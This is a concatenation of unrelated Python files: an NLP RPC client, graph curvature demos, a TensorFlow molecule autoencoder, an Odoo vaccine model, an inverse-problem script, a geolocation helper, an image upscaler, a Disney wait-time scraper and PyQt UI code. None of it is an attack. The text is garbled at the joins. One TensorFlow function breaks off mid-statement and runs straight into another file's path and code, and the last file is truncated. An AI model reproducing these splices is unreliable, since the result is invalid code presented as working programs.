the specific language governing permissions and limitations under the License.} """ import os.path, sys, glob from LingData import SentenceData, Document, labels import xmlrpc.client def main(fname): print(fname) example = "Tim Cook is the CEO of Apple. He is not the CEO of Google." s = xmlrpc.client.ServerProxy('http://localhost:8000') res = s.parse(example) print(res) # Print list of available methods print(s.system.listMethods()) if __name__=="__main__": main("") for y in sys.argv[1:]: for x in glob.glob(y): main(x) isaykatsman/GraphRicciCurvature import networkx as nx from GraphRicciCurvature.FormanRicci import formanCurvature from GraphRicciCurvature.OllivierRicci import ricciCurvature from GraphRicciCurvature.RicciFlow import compute_ricciFlow # Import an example NetworkX karate club graph G = nx.karate_club_graph() # Compute the Ollivier-Ricci curvature of the given graph G G = ricciCurvature(G, alpha=0.5, weight=None, verbose=False) print("Karate Club Graph: The Ollivier-Ricci curvature of edge (0,1) is %f" % G[0][1]["ricciCurvature"]) # Compute the Forman-Ricci curvature of the given graph G G = formanCurvature(G, verbose=False) print("Karate Club Graph: The Forman-Ricci curvature of edge (0,1) is %f" % G[0][1]["formanCurvature"]) #----------------------------------- # Construct a directed graph example Gd = nx.DiGraph() Gd.add_edges_from([(1, 2), (2, 3), (3, 4), (2, 4), (4, 2)]) # Compute the Ollivier-Ricci curvature of the given directed graph Gd Gd = ricciCurvature(Gd) for n1, n2 in Gd.edges(): print("Directed Graph: The Ollivier-Ricci curvature of edge(%d,%d) id %f" % (n1, n2, Gd[n1][n2]["ricciCurvature"])) # Compute the Forman-Ricci curvature of the given directed graph Gd Gd = formanCurvature(Gd) for n1, n2 in Gd.edges(): print("Directed Graph: The Forman-Ricci curvature of edge(%d,%d) id %f" % (n1, n2, Gd[n1][n2]["formanCurvature"])) #----------------------------------- # Multiprocessing computation is also supported G=nx.random_regular_graph(8,1000) ricciCurvature(G,proc=4) # ----------------------------------- # Compute Ricci flow metric - Optimal Transportation Distance G = nx.karate_club_graph() G = compute_ricciFlow(G, iterations=10, method="OTD") # Compute Ricci flow metric - Average Transportation Distance G = nx.karate_club_graph() G = compute_ricciFlow(G, iterations=10, method="ATD") from setuptools import setup setup( name='podfeed', version='1.0', long_description=__doc__, packages=['server'], include_package_data=True, zip_safe=False, install_requires=['flask', 'BeautifulSoup4', 'requests', 'podgen', 'cachetools', 'diskcache'] ) { "targets": [ { "target_name": "kryptonative", "sources": [ "src/crypto.cc" ] } ] }10-100 import numpy as np import tensorflow as tf import numpy as np import threading from itertools import compress class ARAE(): def __init__(self, vocab_size, batch_size=20, latent_size=100, sample_size=100, classification_task=1, regression_task=1): print ('batch size : ', batch_size) print ('latent size : ', latent_size) print ('sample size : ', sample_size) self.vocab_size = vocab_size self.batch_size = batch_size self.latent_size = latent_size self.sample_size = sample_size self.classification_task = classification_task self.regression_task = regression_task self.property_task = regression_task + classification_task self._create_network() def _create_network(self): self.X = tf.placeholder(tf.int32, [self.batch_size, None],name="X") # input smiles self.Y = tf.placeholder(tf.int32, [self.batch_size, None],name="Y") # reconstructed smiles self.S = tf.placeholder(tf.float32, [self.batch_size, self.sample_size],name="S") # seed self.L = tf.placeholder(tf.int32, [self.batch_size],"L") # actual length of SMILES self.N = tf.placeholder(tf.float32, [self.batch_size, self.latent_size],"N") # randomness on latent vectors self.P = tf.placeholder(tf.float32, [self.batch_size, self.property_task],"P") # properties mol_onehot = tf.one_hot(tf.cast(self.X, tf.int32), self.vocab_size) mol_onehot = tf.cast(mol_onehot, tf.float32) self.prefn = [self.latent_size, self.latent_size, self.property_task] self.disfn = [self.latent_size, self.latent_size, 1] self.genfn = [self.latent_size, self.latent_size, self.latent_size] decoded_rnn_size = [self.latent_size] encoded_rnn_size = [self.latent_size] with tf.variable_scope('decode'): decode_cell=[] for i in decoded_rnn_size[:]: decode_cell.append(tf.nn.rnn_cell.LSTMCell(i)) self.decoder = tf.nn.rnn_cell.MultiRNNCell(decode_cell) with tf.variable_scope('encode'): encode_cell=[] for i in encoded_rnn_size[:]: encode_cell.append(tf.nn.rnn_cell.LSTMCell(i)) self.encoder = tf.nn.rnn_cell.MultiRNNCell(encode_cell) self.initial_state=self.decoder.zero_state(self.batch_size, tf.float32) self.weights = {} self.biases = {} self.weights['softmax'] = tf.get_variable("softmaxw", initializer=tf.contrib.layers.xavier_initializer(),\ shape=[decoded_rnn_size[-1], self.vocab_size]) self.biases['softmax'] = tf.get_variable("softmaxb", initializer=tf.contrib.layers.xavier_initializer(), shape=[self.vocab_size]) for i in range(len(self.disfn)): name = 'disfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.latent_size, self.disfn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.disfn[i-1], self.disfn[i]]) name = 'disfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), shape=[self.disfn[i]]) for i in range(len(self.prefn)): name = 'clyfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.latent_size, self.prefn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.prefn[i-1], self.prefn[i]]) name = 'clyfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), shape=[self.prefn[i]]) for i in range(len(self.genfn)): name = 'genfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.sample_size, self.genfn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.genfn[i-1], self.genfn[i]]) name = 'genfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), shape=[self.genfn[i]]) self.mol_encoded0 = self.total_encoder(mol_onehot) self.mol_encoded = tf.nn.l2_normalize(self.mol_encoded0, dim=-1) self.latent_vector = self.generator(self.S) d_real_logits = self.discriminator(self.mol_encoded) d_fake_logits = self.discriminator(self.latent_vector, reuse=True) predicted_property = self.predictor(self.mol_encoded) # regression = tf.slice(predicted_property,[0,0],[-1,self.regression_task]) # classified = tf.slice(predicted_property,[0,self.regression_task],[-1,self.classification_task]) classified = tf.slice(predicted_property,[0,0],[-1,self.classification_task]) regression = tf.slice(predicted_property,[0,self.classification_task],[-1,self.regression_task]) # classified = predicted_property self.classified_logits = tf.nn.sigmoid(classified) self.mol_encoded +=self.N self.mol_decoded_softmax, mol_decoded_logits = self.total_decoder(self.mol_encoded, mol_onehot, self.P) weights = tf.sequence_mask(self.L, tf.shape(self.X)[1]) weights = tf.cast(weights, tf.int32) weights = tf.cast(weights, tf.float32) self.reconstr_loss = tf.reduce_mean(tf.contrib.seq2seq.sequence_loss( logits=mol_decoded_logits, targets=self.Y, weights=weights)) self.g_loss = -tf.reduce_mean(d_fake_logits) self.en_loss = (tf.reduce_mean(d_real_logits)) self.d_loss = (-tf.reduce_mean(d_real_logits)+tf.reduce_mean(d_fake_logits)) # P_reg=tf.slice(self.P,[0,0],[-1,self.regression_task]) # P_class=tf.slice(self.P,[0,self.regression_task],[-1,self.classification_task]) P_class=tf.slice(self.P,[0,0],[-1,self.classification_task]) P_reg=tf.slice(self.P,[0,self.classification_task],[-1,self.regression_task]) self.en_regression_loss = -tf.sqrt(tf.reduce_mean(tf.square(regression-P_reg))) self.regression_loss = tf.sqrt(tf.reduce_mean(tf.square(regression-P_reg))) self.en_classified_loss = -tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=classified,labels=P_class)) self.classified_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=classified,labels=P_class)) self.en_property_loss= self.en_classified_loss + self.en_regression_loss self.property_loss= self.classified_loss + self.regression_loss # self.en_property_loss = self.en_classified_loss # self.property_loss = self.classified_loss # Loss self.lr = tf.Variable(0.0, trainable=False) tvars = tf.trainable_variables() ae_list = [var for var in tvars if 'decode' in var.name or 'encode' in var.name or 'softmax' in var.name] en_list = [var for var in tvars if 'encode' in var.name] gen_list = [var for var in tvars if 'gen' in var.name] dis_list = [var for var in tvars if 'dis' in var.name] pre_list = [var for var in tvars if 'cly' in var.name] print (np.sum([np.prod(v.shape) for v in ae_list])) print (np.sum([np.prod(v.shape) for v in en_list])) print (np.sum([np.prod(v.shape) for v in dis_list])) print (np.sum([np.prod(v.shape) for v in gen_list])) print (np.sum([np.prod(v.shape) for v in pre_list])) print (np.sum([np.prod(v.shape) for v in tvars])) name1 = [v.name for v in ae_list] name2 = [v.name for v in en_list] name3 = [v.name for v in dis_list] name4 = [v.name for v in gen_list] name5 = [v.name for v in pre_list] optimizer1 = tf.train.GradientDescentOptimizer(1.0) optimizer2 = tf.train.AdamOptimizer(1e-5) optimizer3 = tf.train.AdamOptimizer(2e-6) optimizer4 = tf.train.AdamOptimizer(1e-5) self.opt1 = optimizer1.minimize(self.reconstr_loss, var_list = ae_list) self.opt2 = optimizer1.minimize(self.en_loss, var_list = en_list) # update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) self.opt3 = optimizer2.minimize(self.g_loss, var_list = gen_list) self.opt4 = optimizer3.minimize(self.d_loss, var_list = dis_list) self.opt5 = optimizer1.minimize(self.en_property_loss, var_list = en_list) self.opt6 = optimizer1.minimize(self.property_loss, var_list = pre_list) self.clip_dis = [p.assign(tf.clip_by_value(p, -0.01, 0.01)) for p in dis_list] self.mol_pred = tf.argmax(self.mol_decoded_softmax, axis=2) self.sess = tf.Session() init = tf.global_variables_initializer() self.sess = tf.Session() self.sess.run(init) self.saver = tf.train.Saver(max_to_keep=None) # tf.train.start_queue_runners(sess=self.sess) print ("Network Ready") def discriminator(self, Z, reuse=False): Y=Z for i in range(len(self.disfn)): name_w = 'disfw'+str(i+1) name_b = 'disfb'+str(i+1) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i!=len(self.disfn)-1: Y = tf.maximum(Y, 0.2*Y) return Y def predictor(self, Z, reuse=False): Y=Z for i in range(len(self.prefn)): name_w = 'clyfw'+str(i+1) name_b = 'clyfb'+str(i+1) # Y = tf.nn.sigmoid(tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b])) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i!=len(self.prefn)-1: Y = tf.nn.relu(Y) return Y def generator(self, Z, reuse=False): Y=Z for i in range(len(self.genfn)): name_w = 'genfw'+str(i+1) name_b = 'genfb'+str(i+1) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i01 Fundamental/Session 03/delete.py favor = ['deathnote','netflix','teaching'] print("Hi there, here are your favorite things so far") for index, item in enumerate(favor): print(index + 1,'. ',item,sep='') # pos = int(input("Position you want to get rid of? ")) - 1 # favor.pop(pos) fav_name_to_delete = input("Name to delete: ") if fav_name_to_delete in favor: favor.remove(fav_name_to_delete) else: print("Not found") for index, item in enumerate(favor): print(index + 1,'. ',item,sep='') ''' Adds base directory to path so BMSS can be imported. You can just use import BMSS if you have successfully installed it using pip. ''' import sys from os import getcwd, listdir from os.path import abspath, dirname, join #Get base directory __base_dir__ = dirname(dirname(dirname(__file__))) try: import BMSS except: #Append to path sys.path.insert(0, __base_dir__) #Add Styles try: __src_dir__ = join(__base_dir__, 'BMSS') library = join(__src_dir__, 'stylelib') styles = {file.split('.')[0]: abspath(join(library,file)) for file in listdir(library)} except Exception as e: print(e.args) styles = {} sisvac_appointments/models/product.py from odoo import models, fields class Product(models.Model): _inherit = "product.template" sisvac_is_vaccine = fields.Boolean("Is vaccine?") sisvac_dose_qty = fields.Integer(default=1) sisvac_dose_interval = fields.Integer() sisvac_unit_time_between_dose = fields.Selection( [("days", "Days"), ("weeks", "Weeks"), ("months", "Month"), ("years", "Years")], default="days", ) # TODO: what are these fields for? # sisvac_frequency = fields.Integer() # sisvac_unit_frequency = fields.Selection( # [("days", "Days"), ("weeks", "Weeks"), ("month", "Month"), ("years", "Years")], # default="days", # ) """ This file compute the solution of Stochastic Inverse Problem of truncated domain, and generate figures used in the dissertation """ import bet.calculateP.simpleFunP as simpleFunP import bet.calculateP.calculateP as calculateP import bet.postProcess.plotP as plotP import bet.sample as samp import bet.sampling.basicSampling as bsam import numpy.random as nprand import numpy as np import pickle import myModel_linearode as mm import sys import os import inversefuns.linearode as lr from matplotlib import pyplot as plt # Read arguments from input decaynum = int(sys.argv[1]) figurepath = "figures_linearode/decay-"+str(decaynum) if not os.path.isdir(figurepath): os.makedirs(figurepath) # Whether to create new output data createNewOutputData = sys.argv[2].lower() == 'true' # Generate true parameters an, bn = mm.true_param() coef_true= np.zeros((1,10)) coef_true[0,0::2] = an coef_true[0,1::2] = bn # Initialize 2*trunc_term input parameter sample set object # trunc_term is defined in myModel input_samples = samp.sample_set(2*mm.param_len) # Set parameter domain parameter_domain = mm.my_model_domain(pow = -decaynum, halfwidth0 = 0.5) input_samples.set_domain(parameter_domain) # Define the sampler that will be used to create the discretization # object, which is the fundamental object used by BET to compute # solutions to the stochastic inverse problem sampler = bsam.sampler(mm.my_model) # Generate samples on the parameter space randomSampling = True if randomSampling is True: input_samples = sampler.random_sample_set('random', input_samples, num_samples =200000) else: num_samples_per_dim = 5 input_samples = sampler.regular_sample_set(input_samples, num_samples_per_dim = num_samples_per_dim) ''' A standard Monte Carlo (MC) assumption is that every Voronoi cell has the same volume. ''' MC_assumption = True # Estimate volumes of Voronoi cells associated with the parameter samples if MC_assumption is False: input_samples.estimate_volume(n_mc_points=1E7) else: input_samples.estimate_volume_mc() # Create the discretization object using the input samples my_discretization = sampler.compute_QoI_and_create_discretization(input_samples) # Create a reference parameter simulating the scenario where a true parameter # is responsible for an observed QoI datum. We model the uncertainty in the # recorded reference QoI datum below. ref_samples = samp.sample_set(2*mm.param_len) ref_samples.set_domain(parameter_domain) Random_ref = False # Using Random_ref or the true parameter if Random_ref is True: nprand.seed(1) ref_discretization = sampler.create_random_discretization('random', ref_samples, num_samples=1) else: ref_samples.set_values(coef_true) ref_discretization = sampler.compute_QoI_and_create_discretization(ref_samples) # The create_random_discretization function has 2 steps # First: generate the input_sample_set using random_sample_set # Second: generate output_sample_set using compute_QoI_and_create_discretization param_ref = ref_discretization._input_sample_set.get_values() Q_ref = ref_discretization._output_sample_set.get_values()[0,:] randomDataDiscretization = False if createNewOutputData is False: output_probability_set = pickle.load( open( "output_probability_set.p", "rb" ) ) my_discretization._output_probability_set = output_probability_set else: if randomDataDiscretization is False: simpleFunP.regular_partition_uniform_distribution_rectangle_scaled( data_set=my_discretization, Q_ref=Q_ref, rect_scale=0.08, cells_per_dimension = 3) else: simpleFunP.uniform_partition_uniform_distribution_rectangle_scaled( data_set=my_discretization, Q_ref=Q_ref, rect_scale=0.05, M=50, num_d_emulate=1E5) output_probability_set = my_discretization._output_probability_set pickle.dump( output_probability_set, open( "output_probability_set.p", "wb" ) ) # calculate probablities calculateP.prob(my_discretization) ######################################## # Post-process the results ######################################## figurepath="figures_linearode/decay-"+str(decaynum) if not os.path.isdir(figurepath): os.makedirs(figurepath) #calculate 2d marginal probs (bins, marginals2D) = plotP.calculate_2D_marginal_probs(input_samples, nbins = 10) plotP.plot_2D_marginal_probs(marginals2D, bins, input_samples, filename = figurepath+"/linearode_IVP_reg", lam_ref=param_ref[0,:], file_extension = ".eps", plot_surface=False) # smooth 2d marginals probs (optional) #marginals2D = plotP.smooth_marginals_2D(marginals2D, bins, # sigma=0.2*(parameter_domain[:,1]-parameter_domain[:,0])) # plot 2d marginals probs #plotP.plot_2D_marginal_probs(marginals2D, bins, input_samples, filename = "linear_ODE_IVP", # lam_ref=param_ref[0,:], file_extension = ".eps", plot_surface=False) # # calculate 1d marginal probs # (bins, marginals1D) = plotP.calculate_1D_marginal_probs(input_samples, # nbins = 10) # # smooth 1d marginal probs (optional) # marginals1D = plotP.smooth_marginals_1D(marginals1D, bins, # sigma=0.2 * (parameter_domain[:, 1] - parameter_domain[:, 0])) # # plot 1d marginal probs # plotP.plot_1D_marginal_probs(marginals1D, bins, input_samples, filename = "figures_linearode/linearode_IVP_reg", # lam_ref=param_ref[0,:], file_extension = ".eps") # Get index of high probability points arghigh=np.argsort(-my_discretization._input_sample_set._probabilities_local) t = np.linspace(0,1,1001) y = lr.linear_ode_fourier(t,coef_true[0,0::2],coef_true[0,1::2]) # Generate the first 10 curves corresponding to the high probability Fourier coefficients samples sol_all = np.zeros((1001,10)) for i in range(0,10): sol = lr.linear_ode_fourier(t,input_samples._values_local[arghigh[i],0::2], input_samples._values_local[arghigh[i],1::2]) sol_all[:,i]=sol # Generate the figures # figure Figurelr is not used in the final dissertation grid = [100,200,400,500,700] plt.figure() plt.plot(t,y,lw=2) plt.plot(t[grid], y[grid], 'o') for i in range(0,10): plt.plot(t,sol_all[:,i],lw=2,alpha=0.4) plt.savefig(figurepath+"/Figurelr.pdf") # orin0 = lr.fourier_exp_vec(t,coef_true[0,0::2],coef_true[0,1::2]) orin1 = (1-t)*t orin_all = np.zeros((1001,10)) for i in range(0,10): orin=lr.fourier_exp_vec(t,input_samples._values_local[arghigh[i],0::2],input_samples._values_local[arghigh[i],1::2]) orin_all[:,i]=orin plt.figure() plt.plot(t,orin0,lw=2) plt.plot(t,orin1) plt.plot(t[grid], orin0[grid], 'o',color='blue') plt.ylim([-0.4,0.8]) #plt.plot(t,orin1,lw=2) for i in range(0,10): plt.plot(t,orin_all[:,i],lw=2,alpha=0.3,color='black') #plt.ylim( (-0.2, 0.3) ) plt.savefig(figurepath+"/fundecay"+str(decaynum)+".pdf") Hydrospheredata/hydro-profiler def safe_divide(n, d): return n / d if d else 0 ''' Export/Spreadsheet/crosslinks _____________________________ Generates the spreadsheet data for a individually sequenced crosslinks. :copyright: (c) 2015 The Regents of the University of California. :license: GNU GPL, see licenses/GNU GPLv3.txt for more details. ''' # load modules/submodules import types from xldlib.utils import logger from . import base from .. import formats # FORMATTING # ---------- CLASSES = [ ('Protein Mods', formats.ProteinModifications), ('Peptide', formats.ModificationsInPeptide), ('Linear w/ Mods', formats.ToSkyline) ] # CROSSLINKS # ---------- @logger.init('spreadsheet', 'DEBUG') class CreateCrosslinkData(base.SpreadsheetData): ''' Processes the spreadsheet data for an identified (sequenced or predicted via isotope labels) link ''' def __init__(self, row): super(CreateCrosslinkData, self).__init__(row) source = self.app.discovererthread self.crosslinkers = source.parameters.crosslinkers self.isobaric = source.parameters.isobaric self.reporterions = source.reporterions self.processing = {} for column, cls in CLASSES: self.processing[column] = cls(row) @logger.call('spreadsheet', 'debug') def __call__(self, crosslink): '''Returns the spreadsheet data as a dictionary''' values = base.RowValues() self.spreadsheetrow.setattrs(values) self.spreadsheetrow.setdata(values, crosslink.index) self.setcrosslinkdata(values, crosslink) self.setprocessing(values, crosslink) if self.reporterions: self.spreadsheetrow.setreporter(values, crosslink.index) else: self.spreadsheetrow.setreporternull(values, crosslink.index) return values # SETTERS @logger.call('spreadsheet', 'debug') def setcrosslinkdata(self, values, crosslink): '''Sets the crosslinker data''' values.update(crosslink.tospreadsheet()) values.update(self.formatcrosslinktypes(crosslink).tospreadsheet()) values['XL'] = position = list(self.fragments(crosslink.index)) values['Subunit Names'] = self.formatsubunits(crosslink.index) values['Linkage Info'] = self.formatlinkage(position, crosslink.index) values['Linear'] = self.formatlinear(crosslink.index) values['xiNet'] = self._xinet(crosslink.index, position) @logger.call('spreadsheet', 'debug') def setprocessing(self, values, crosslink): '''Uses processing functions to store custom data displays''' for column, inst in self.processing.items(): value = inst(crosslink) if isinstance(value, types.GeneratorType): value = list(value) values[column] = value # FORMATTERS @logger.call('spreadsheet', 'debug') def formatcrosslinktypes(self, crosslink): '''0 -> LinkTypes(intersubunit="T", ...)''' intrasubunit = self.getintrasubunit(crosslink.index) return crosslink.totypes(intrasubunit) import requests from diskcache import Cache cache = Cache("cache") @cache.memoize() def ip_location(ip: str): ip_api_res = requests.get(f"http://ip-api.com/json/{ip}?fields=lat,lon") ip_api_json = ip_api_res.json() try: return { "ip": ip, "lat": ip_api_json["lat"], "lon": ip_api_json["lon"] } except KeyError as ke: # ip-api didn't return location return None FreddyMurphy/MLOpsProject import os import matplotlib import matplotlib.pyplot as plt import torch from hydra.utils import get_original_cwd from PIL import Image from torchvision import transforms from torchvision.utils import save_image # Needed to render on Linux matplotlib.use('Agg') def save_model_output_figs(model, div2k): # data_path = os.path.join(get_original_cwd(), 'data/raw/DIV2K_valid_HR') # data = DIV2K(data_path) # dataloader = DataLoader(data, batch_size=1, num_workers=4) dataloader = div2k.test_dataloader() print('size:', len(dataloader)) num_images = 3 if (num_images > 5): num_images = 5 fig, axes = plt.subplots(num_images, 3, figsize=(15, 15)) for idx, (high_res, low_res) in enumerate(dataloader): for i in range(num_images): high_tensor = high_res[i, ...] with torch.no_grad(): upscaled = model(low_res[i, ...].unsqueeze_(0)) low_tensor = low_res[i, ...] upscaled = upscaled.squeeze(0) axes[i, 0].imshow(high_tensor.permute(1, 2, 0)) axes[i, 1].imshow(upscaled.permute(1, 2, 0)) axes[i, 2].imshow(low_tensor.permute(1, 2, 0)) axes[i, 0].axis('off') axes[i, 1].axis('off') axes[i, 2].axis('off') axes[i, 0].set_xticklabels([]) axes[i, 0].set_yticklabels([]) axes[i, 1].set_xticklabels([]) axes[i, 1].set_yticklabels([]) axes[i, 2].set_xticklabels([]) axes[i, 2].set_yticklabels([]) axes[0, 0].set_title('High-res') axes[0, 1].set_title('Upscaled low-res') axes[0, 2].set_title('Low-res') fig.suptitle("Image comparison") plt.tight_layout() plt.savefig( os.path.join(get_original_cwd(), "reports/figures/image_comparison_double.png")) def infer_files(model, data_path): file_names = os.listdir(data_path) DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu') output_dir = os.path.join(data_path, 'upscaled') os.makedirs(output_dir, exist_ok=True) print(torch.cuda.memory_allocated(0)) model = model.to(DEVICE) print(torch.cuda.memory_allocated(0)) print('Starting inference') # batch_size=1 since images might not be same size for idx, file_name in enumerate(file_names): img_path = os.path.join(data_path, file_name) if os.path.isdir(img_path): continue with Image.open(img_path) as img: img = img.convert("RGB") img = transforms.ToTensor()(img) img = img.unsqueeze_(0) img = img.to(DEVICE) print('inferring index:', idx) with torch.no_grad(): upscaled_tensor = model(img) upscaled_tensor = upscaled_tensor.to('cpu') img = img.to('cpu') image_path = os.path.join(output_dir, file_name) save_image(upscaled_tensor, image_path) del upscaled_tensor if __name__ == '__main__': save_model_output_figs() 0 # coding: utf-8 # In[2]: import requests from datetime import datetime import pandas as pd from unidecode import unidecode # In[3]: class disney_park: def __init__(self): self.__API_BASE = "https://api.wdpro.disney.go.com/" self.tokendata = self.__get_tokendata() self.token = self.tokendata['access_token'] self.expirtime = self.tokendata['expires_in'] self.parkid = self.get_parkid() self.resortid = self.get_resortid() self.__headers = { 'Accept-Language' : 'en_US', 'User-Agent': 'UIEPlayer/2.1 iPhone OS 6.0.1', 'Accept' : 'application/json;apiversion=1', 'Authorization' : "BEARER "+str(self.token), 'X-Conversation-Id' : 'WDPRO-MOBILE.MDX.CLIENT-PROD', 'X-Correlation-ID' : str(datetime.now().timestamp()) } self.rawwaitdata = self.__get_rawwaitdata() self.timeretrieved = self.__get_time() self.size = len(self.rawwaitdata['entries']) self.waitdata,self.names = self.__get_waitdata() self.__entertainment_indeces,self.__reverse_ent_indeces = self.__get_ent_indeces() self.waitdata_attractions = self.waitdata.iloc[:,self.__reverse_ent_indeces] self.waitdata_entertainement = self.waitdata.iloc[:,self.__entertainment_indeces] if self.can_get_fastpass(): self.fastpass,self.__truefastpassindex = self.get_fastpass() self.fastpasstrue = self.fastpass.iloc[:,self.__truefastpassindex] self.isopen,self.__op_index = self.__get_isopen() self.openwaitdata = self.waitdata.iloc[:,self.__op_index] self.rawscheduledata = self.__get_rawscheduledata() self.todays_hours = self.get_scheduledata() def refresh(self): """Refreshes the information by reinitializing the object.""" self.__init__() def __get_tokendata(self): """Grabs Auth Token""" TOKEN_URL = 'https://authorization.go.com/token?grant_type=assertion&assertion_type=public&client_id=WDPRO-MOBILE.MDX.WDW.ANDROID-PROD' r = requests.post(url = TOKEN_URL) data = r.json() return(data) def get_parkid(self): """Park ID provided by inherited class""" raise("Method Must Be Defined By Inherited Class") return(0) def get_resortid(self): """Resort ID provided by inherited class""" raise("Method Must Be Defined By Inherited Class") return(0) def __get_rawwaitdata(self): """Raw Wait Data Input to be used by other attributes and methods""" r = requests.get(url = self.__API_BASE+'facility-service/theme-parks/{}/wait-times'.format(self.parkid),headers=self.__headers) data = r.json() return(data) def __get_rawscheduledata(self,startDate =datetime.now().strftime('%Y-%m-%d'),endDate = False ): """Raw Schedule Data Input to be used by other attributes and methods""" if not endDate: endDate = startDate r = requests.get(url = self.__API_BASE + 'mobile-service/public/ancestor-activities-schedules/{};entityType=destination?filters=theme-park&startDate={}&endDate={}®ion=us'.format(self.resortid,startDate,endDate),headers=self.__headers) data = r.json() return(data) def __get_time(self): """Grab time when accessing API""" time = datetime.now() return(time) def __get_waitdata(self): """Cleans Wait Data From Raw Wait Data""" rawdata = self.rawwaitdata names = [] times = [] for i in range(0,self.size): names.append(unidecode(rawdata['entries'][i]['name'].replace('"','').replace(' ','_').replace('–','_').replace("'",'').replace(':','_').replace('!','').replace(',','').replace('\xa0','').replace('.','').replace('&','and').replace('-','').replace('É','e').lower().strip()+ '_' + str(rawdata['entries'][i]['id']).split(';')[0])) try: times.append([rawdata['entries'][i]['waitTime']['postedWaitMinutes']]) except KeyError: if rawdata['entries'][i]['waitTime']['status'] == "Down": times.append([-1]) elif rawdata['entries'][i]['waitTime']['status'] == "Operating": times.append([0]) else: times.append([-2]) data = dict(zip(names,times)) data = pd.DataFrame.from_dict(data) data = data[names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time return(data,names) def __get_ent_indeces(self): """Grabs Indeces of Entertainment (Also Returns Indeces of Attractions)""" types = [] for i in range(0,len(self.rawwaitdata['entries'])): types.append(self.rawwaitdata['entries'][i]['type']) indeces = [i for i,x in enumerate(types) if x=='Entertainment'] reverse_indeces= list(set(range(0,self.size)) - set(indeces)) time_indeces = [self.size] indeces.extend(time_indeces) reverse_indeces.extend(time_indeces) return((indeces,reverse_indeces)) def get_fastpass(self): """Extracts Fastpass Data from Raw Wait Data""" rawdata = self.rawwaitdata times = [] indeces = [] for i in range(0,self.size): if rawdata['entries'][i]['waitTime']['fastPass']['available']: try: indeces.append(i) times.append([int(rawdata['entries'][i]['waitTime']['fastPass']['startTime'].replace(':','')[:-2])]) except: times.append([-1]) else: times.append([-2]) data = dict(zip(self.names,times)) data = pd.DataFrame.from_dict(data) data = data[self.names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time time_indeces = [self.size] indeces.extend(time_indeces) return((data,indeces)) def can_get_fastpass(self): """Pass False if Park Data does not include Fastpass""" raise(("Method Must Be Defined By Inherited Class")) def __get_isopen(self): """Grabs Status of Attractions/Entertainment (Operating Or Not), Also Returns Indices of Open Attractions/Entertainment""" rawdata = self.rawwaitdata operating_or_not = [] op_index = [] for i in range(0,self.size): if rawdata['entries'][i]['waitTime']['status'] == 'Operating': operating_or_not.append(['Operating']) op_index.append(i) elif rawdata['entries'][i]['waitTime']['status'] == 'Down': operating_or_not.append(['Down']) op_index.append(i) else: operating_or_not.append(['Closed']) data = dict(zip(self.names,operating_or_not)) data = pd.DataFrame.from_dict(data) data = data[self.names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time time_indeces = [self.size] op_index.extend(time_indeces) return(operating_or_not,op_index) def get_scheduledata(self,startDate = False,endDate = False): """Cleans Schedule Data, Can Be Used Seperately to Find Schedule Of Specified Range. startDate and endDate Format is string "YYYY-MM-DD" """ if startDate: rawdata = self.__get_rawscheduledata(startDate=startDate,endDate = endDate) else: rawdata = self.rawscheduledata for i in range(0,len(rawdata['activities'])): if rawdata['activities'][i]['id'].split(';')[0] == str(self.parkid): rightdata = rawdata['activities'][i]['schedule']['schedules'] for j in range(0,len(rightdata)): if rightdata[j]['type']=='Operating': tempdata = pd.DataFrame(rightdata[j],index=[0]) data = tempdata return(data.reset_index(drop=True)) # In[4]: class Disneyland(disney_park): def get_parkcoord(self): return({'lat':33.8121,'lon':-117.9190}) def get_parkid(self): return(330339) def get_resortid(self): return(80008297) def can_get_fastpass(self): return(True) class CaliforniaAdventure(disney_park): def get_parkid(self): return(336894) def get_resortid(self): return(80008297) def can_get_fastpass(self): return(True) class MagicKingdom(disney_park): def get_parkid(self): return(80007944) def get_resortid(self): return(80007798) def can_get_fastpass(self): return(True) # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'interfaz_1.ui' # # Created by: PyQt5 UI code generator 5.4.1 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets class Ui_instalador_interfaz_1(object): def setupUi(self, instalador_interfaz_1): instalador_interfaz_1.setObjectName("instalador_interfaz_1") instalador_interfaz_1.setEnabled(True) instalador_interfaz_1.resize(684, 454) instalador_interfaz_1.setMinimumSize(QtCore.QSize(684, 454)) instalador_interfaz_1.setMaximumSize(QtCore.QSize(684, 454)) self.facyt_logo = QtWidgets.QLabel(instalador_interfaz_1) self.facyt_logo.setGeometry(QtCore.QRect(40, 220, 141, 161)) self.facyt_logo.setText("") self.facyt_logo.setPixmap(QtGui.QPixmap("assets/facyt.png")) self.facyt_logo.setScaledContents(True) self.facyt_logo.setObjectName("facyt_logo") self.uc_logo = QtWidgets.QLabel(instalador_interfaz_1) self.uc_logo.setGeometry(QtCore.QRect(50, 40, 111, 161)) self.uc_logo.setText("") self.uc_logo.setPixmap(QtGui.QPixmap("assets/log_uc.png")) self.uc_logo.setScaledContents(True) 